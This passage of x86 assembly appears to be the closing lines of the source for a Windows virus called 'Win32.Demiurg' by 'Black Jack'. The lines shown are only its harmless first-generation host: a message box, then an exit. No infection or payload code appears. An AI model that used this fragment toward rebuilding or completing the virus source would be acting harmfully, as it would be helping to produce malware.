|||
|
call MessageBoxA
|
|||
|
|
|||
|
push 0
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
caption db "Win32.Demiurg virus by Black Jack", 0
|
|||
|
message db "First generation host", 0
|
|||
|
|
|||
|
end start
|